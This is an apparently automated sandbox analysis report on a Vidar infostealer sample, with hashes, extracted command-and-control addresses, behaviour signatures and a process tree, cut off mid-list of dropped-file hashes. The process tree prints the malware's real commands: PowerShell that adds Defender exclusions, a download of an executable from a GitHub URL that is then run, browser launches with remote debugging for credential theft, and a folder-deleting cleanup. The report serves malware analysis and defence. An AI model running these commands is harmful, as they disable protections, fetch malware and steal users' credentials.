Analysis

  • max time kernel
    142s
  • max time network
    135s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31/03/2025, 21:29

General

  • Target

    2025-03-31_882f2b592e06416f4941bb547b6cfb78_black-basta_cobalt-strike_satacom.exe

  • Size

    356KB

  • MD5

    882f2b592e06416f4941bb547b6cfb78

  • SHA1

    8a0924295b92688ceab0dcf3ba2fc32c73ae46e4

  • SHA256

    73ebf92726261418991dfda72c656a6b9b8322a1fb79315ec5e614857431a77f

  • SHA512

    3ed5bdc33be70e2fc8c40b528939e60d7cc1a7dc5759582a27e9c05e255e6078356eb3957829d4d298fd03f3f3263a09a6728f4c776aa218f75862a486e19872

  • SSDEEP

    6144:kXXP6c1lu4PtsMUAfRf+BHA1V8x4ZvkbsUoUM/fbh+oJLX:kXD184PtrLRf+BgY4Zs7oZ/FzX

Malware Config

Extracted

Family

vidar

Version

13.3

Botnet

23b8a0e48f77dc82cb41b2936121fd07

C2

https://t.me/lw25chm

https://steamcommunity.com/profiles/76561199839170361

Attributes
  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0

Signatures

  • Detect Vidar Stealer 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Powershell Invoke Web Request.

  • Downloads MZ/PE file 1 IoCs
  • Uses browser remote debugging 2 TTPs 10 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of FindShellTrayWindow 28 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-03-31_882f2b592e06416f4941bb547b6cfb78_black-basta_cobalt-strike_satacom.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-03-31_882f2b592e06416f4941bb547b6cfb78_black-basta_cobalt-strike_satacom.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:808
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\iusrukkwgoii', 'C:\Users', 'C:\ProgramData'"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3972
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\iusrukkwgoii', 'C:\Users', 'C:\ProgramData'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1128
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/mnotpadppppp.exe' -OutFile 'C:\Users\Admin\AppData\Local\iusrukkwgoii\iftgdrecznmc.exe'"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1944
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/mnotpadppppp.exe' -OutFile 'C:\Users\Admin\AppData\Local\iusrukkwgoii\iftgdrecznmc.exe'"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5040
    • C:\Users\Admin\AppData\Local\iusrukkwgoii\iftgdrecznmc.exe
      "C:\Users\Admin\AppData\Local\iusrukkwgoii\iftgdrecznmc.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1496
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        3⤵
        • Uses browser remote debugging
        • Checks processor information in registry
        • Enumerates system info in registry
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:1012
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd9d7cdcf8,0x7ffd9d7cdd04,0x7ffd9d7cdd10
          4⤵
            PID:4908
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1884,i,8339895209737092570,2084430842142499367,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1876 /prefetch:2
            4⤵
              PID:4564
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2236,i,8339895209737092570,2084430842142499367,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2240 /prefetch:3
              4⤵
                PID:1636
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2372,i,8339895209737092570,2084430842142499367,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2624 /prefetch:8
                4⤵
                  PID:2748
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3232,i,8339895209737092570,2084430842142499367,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3276 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:3516
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3240,i,8339895209737092570,2084430842142499367,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3296 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:4972
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4276,i,8339895209737092570,2084430842142499367,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4244 /prefetch:2
                  4⤵
                  • Uses browser remote debugging
                  PID:4776
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4600,i,8339895209737092570,2084430842142499367,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4668 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:3176
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5364,i,8339895209737092570,2084430842142499367,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5376 /prefetch:8
                  4⤵
                    PID:2564
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5356,i,8339895209737092570,2084430842142499367,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5428 /prefetch:8
                    4⤵
                      PID:1464
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5376,i,8339895209737092570,2084430842142499367,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5560 /prefetch:8
                      4⤵
                        PID:2232
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5736,i,8339895209737092570,2084430842142499367,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5744 /prefetch:8
                        4⤵
                          PID:4656
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5728,i,8339895209737092570,2084430842142499367,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5692 /prefetch:8
                          4⤵
                            PID:4768
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5460,i,8339895209737092570,2084430842142499367,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5748 /prefetch:8
                            4⤵
                              PID:3580
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                            3⤵
                            • Uses browser remote debugging
                            • Checks processor information in registry
                            • Enumerates system info in registry
                            • Modifies registry class
                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                            • Suspicious use of FindShellTrayWindow
                            PID:5476
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x250,0x7ffd9c95f208,0x7ffd9c95f214,0x7ffd9c95f220
                              4⤵
                                PID:5504
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1976,i,9485563299199922352,12955863050551464339,262144 --variations-seed-version --mojo-platform-channel-handle=2280 /prefetch:3
                                4⤵
                                  PID:5728
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2156,i,9485563299199922352,12955863050551464339,262144 --variations-seed-version --mojo-platform-channel-handle=2148 /prefetch:2
                                  4⤵
                                    PID:5736
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2580,i,9485563299199922352,12955863050551464339,262144 --variations-seed-version --mojo-platform-channel-handle=2764 /prefetch:8
                                    4⤵
                                      PID:5836
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3568,i,9485563299199922352,12955863050551464339,262144 --variations-seed-version --mojo-platform-channel-handle=3604 /prefetch:1
                                      4⤵
                                      • Uses browser remote debugging
                                      PID:6072
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3576,i,9485563299199922352,12955863050551464339,262144 --variations-seed-version --mojo-platform-channel-handle=3592 /prefetch:1
                                      4⤵
                                      • Uses browser remote debugging
                                      PID:6084
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4248,i,9485563299199922352,12955863050551464339,262144 --variations-seed-version --mojo-platform-channel-handle=4272 /prefetch:1
                                      4⤵
                                      • Uses browser remote debugging
                                      PID:6136
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4300,i,9485563299199922352,12955863050551464339,262144 --variations-seed-version --mojo-platform-channel-handle=4388 /prefetch:2
                                      4⤵
                                      • Uses browser remote debugging
                                      PID:5124
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5264,i,9485563299199922352,12955863050551464339,262144 --variations-seed-version --mojo-platform-channel-handle=3640 /prefetch:8
                                      4⤵
                                        PID:5180
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4864,i,9485563299199922352,12955863050551464339,262144 --variations-seed-version --mojo-platform-channel-handle=5320 /prefetch:8
                                        4⤵
                                          PID:5036
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3712,i,9485563299199922352,12955863050551464339,262144 --variations-seed-version --mojo-platform-channel-handle=5388 /prefetch:8
                                          4⤵
                                            PID:4444
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4204,i,9485563299199922352,12955863050551464339,262144 --variations-seed-version --mojo-platform-channel-handle=5436 /prefetch:8
                                            4⤵
                                              PID:4716
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\a1vsr" & exit
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:5924
                                            • C:\Windows\SysWOW64\timeout.exe
                                              timeout /t 11
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              • Delays execution with timeout.exe
                                              PID:6004
                                      • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                        "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                        1⤵
                                          PID:4472
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                          1⤵
                                            PID:4808
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                            1⤵
                                              PID:5744

                                            Network

                                            MITRE ATT&CK Enterprise v15

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                              Filesize

                                              649B

                                              MD5

                                              79590fe9bba18daf299ca8652d346d1a

                                              SHA1

                                              adddc04a3cfc19fad6c1d07c4d89402e838d2e45

                                              SHA256

                                              6b525ce5992b28fd4f302ab273a81202f226a6f42fcc947b706fc2d65e71b930

                                              SHA512

                                              05fbb8f028332675418eb80f50f2840886091ff9775cd39a1072be24bc137e0dd3b2c8ed9c4c05960b71869e6acca3f18e0ec236b67e41ac99547a1bf3dbdc1b

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                              Filesize

                                              2B

                                              MD5

                                              d751713988987e9331980363e24189ce

                                              SHA1

                                              97d170e1550eee4afc0af065b78cda302a97674c

                                              SHA256

                                              4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                              SHA512

                                              b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                              Filesize

                                              80KB

                                              MD5

                                              325f43ad6412e861f2be6b799efb0611

                                              SHA1

                                              221df5f4a40a60d6eb3a07243aabd1eceded8e69

                                              SHA256

                                              7aab8a74ac3bb9602a97690775ce601b27e34fb2d36dbdd087f95f562ae7c5ff

                                              SHA512

                                              4fa216f46acb956cf7e8394ba03669ee8e8440c5f62439026e0666aaced28ead42d8778518aa48857c57b981155cf09b1cea7a74f9ae4b9834343b0c4400ba79

                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                              Filesize

                                              2KB

                                              MD5

                                              d85ba6ff808d9e5444a4b369f5bc2730

                                              SHA1

                                              31aa9d96590fff6981b315e0b391b575e4c0804a

                                              SHA256

                                              84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                              SHA512

                                              8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                              Filesize

                                              280B

                                              MD5

                                              049e5a246ed025dee243db0ba8e2984c

                                              SHA1

                                              15ec2d2b28dcfc17c1cfb5d0c13482d0706f942d

                                              SHA256

                                              33071ca42c472861a2fabd0f82f8b03ef0daaa6796b24b83f3df02587e4c3d12

                                              SHA512

                                              bc5f6fa6a8cae20ab40eae4552650d75f38ebb158c95288a79d9f332623bb507946513c39d19c00a5aee323df01f0f1a51c54594ef1c293289baf45f4ae2145b

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                              Filesize

                                              280B

                                              MD5

                                              4facd0ff10154cde70c99baa7df81001

                                              SHA1

                                              65267ea75bcb63edd2905e288d7b96b543708205

                                              SHA256

                                              a13534df0cd0a79a3a1b91085a6d575b47d5a9aad7fc6d712fd2616c0e95a23b

                                              SHA512

                                              ad8d2b965851c0ddc23e92ae151b3b0b2bcda850c446f4278bdb0754d6b42ead8fc034b394749578a27b33ad7e4ab0633f974dfd4773fbe4d93ae477f00b73f2

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\9e8876ad-e3b3-4a5a-849b-113a5581a618.tmp

                                              Filesize

                                              69KB

                                              MD5

                                              164a788f50529fc93a6077e50675c617

                                              SHA1

                                              c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48

                                              SHA256

                                              b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17

                                              SHA512

                                              ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\cc742e8e-8d86-4c2c-a946-d520a388195f\index-dir\the-real-index

                                              Filesize

                                              720B

                                              MD5

                                              97a2d00af5d6062bc3bc6929d20c96d0

                                              SHA1

                                              2e3963d9c2b923ae7295d580348243dd4db1e8bc

                                              SHA256

                                              7d37aa554cae3570a79d81b938c28b13555009ec7640efdd3d0bd4074de41d1e

                                              SHA512

                                              3fbab9781b8fff77df0f812b2bc9b43a8e27b2a0fdb5e76372c2778f05b1736a9a03df04051b4a6b588d2e38a82d87fa8feb1c66d2ace286ff0704009f66f402

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\cc742e8e-8d86-4c2c-a946-d520a388195f\index-dir\the-real-index~RFe5818a4.TMP

                                              Filesize

                                              720B

                                              MD5

                                              d8d1ac90795253720079c10b0ff5b04b

                                              SHA1

                                              1e7c2af404d1c561f0f12904e8dca9782cbf33ad

                                              SHA256

                                              7f88dae682de533bcf814141ff3cf70e97c880355f08954efcf1ed9d052f023d

                                              SHA512

                                              7abd34ad00059e0fa7e1ee3ca3cfa69382ee21ea9fbf047ad55ddda7640fa12b83c90d93c785cd22410058ae7c04ac9ddae67eb8d2a7140264b66f3bdcbc7deb

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\e62928b4-81c1-444b-ba46-3a1b0f33a149.tmp

                                              Filesize

                                              1B

                                              MD5

                                              5058f1af8388633f609cadb75a75dc9d

                                              SHA1

                                              3a52ce780950d4d969792a2559cd519d7ee8c727

                                              SHA256

                                              cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

                                              SHA512

                                              0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                              Filesize

                                              6KB

                                              MD5

                                              8633a5de82f677a7c5590d037206847f

                                              SHA1

                                              19a92b302cb98a355721a3b68a9165077e75f675

                                              SHA256

                                              eba745e33d8dd89da9048844525c411fa7a166858c8c2b594bab3845ac4bbf3a

                                              SHA512

                                              c024d9135dcd9445fe734bdc2f48594736ee8c5f33667975aff63593ce97e3bda0efb0b8ca5125201f0e2d4709eb54eb6ef37afa47f85657786b30b435407966

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                              Filesize

                                              7KB

                                              MD5

                                              486bdf25ebb40ad3e5ae07314ea01935

                                              SHA1

                                              77af0c4fe529cae0650ea96b1701f5c5bbeed12d

                                              SHA256

                                              7e610baa7438af5bdb5ff023eb0907f0e0d23a2baba570347ccd559ebe63384d

                                              SHA512

                                              b961ec9fda1d994398a6699fcd973877d375df71e33c0d5b8706ee0f1dc400fb52fba5ee508e25200abf62ccaea4f43323c74b360b2dc0f4d16742f5a5a78bdb

                                            • C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                              Filesize

                                              2KB

                                              MD5

                                              564ab2d56a94fa3a368acfaafc1a414f

                                              SHA1

                                              c8e11164a5cd599fc4f52c3c5c04834d1fc11299

                                              SHA256

                                              bdbf1af41835bb620775a547f59c390edb5eadbf296941453819ade19025cc8c

                                              SHA512

                                              65e8fe11040d8295b499bcd21d6155828858ed7d98ef2aefc2a7da72dccd6774d2e9c31b95588cac9531801e837d4cd10fc007998824e5c046b6fbe149feb31c

                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Filesize

                                              944B

                                              MD5

                                              93771c301aacc738330a66a7e48b0c1b

                                              SHA1

                                              f7d7ac01f1f13620b1642d1638c1d212666abbae

                                              SHA256

                                              5512157a9ea31f455e244922910fcdb2b8116288d968b0e5e26c91b266d4de7c

                                              SHA512

                                              a51f43e335c8c6da130866115ee6d890f808379548b129e20e563c5ee0234cca186ecde4fd6bc609f0eba6e32b10d080f4f67483461cdd58ef0a60db78324309

                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hdfjczd1.r0v.ps1

                                              Filesize

                                              60B

                                              MD5

                                              d17fe0a3f47be24a6453e9ef58c94641

                                              SHA1

                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                              SHA256

                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                              SHA512

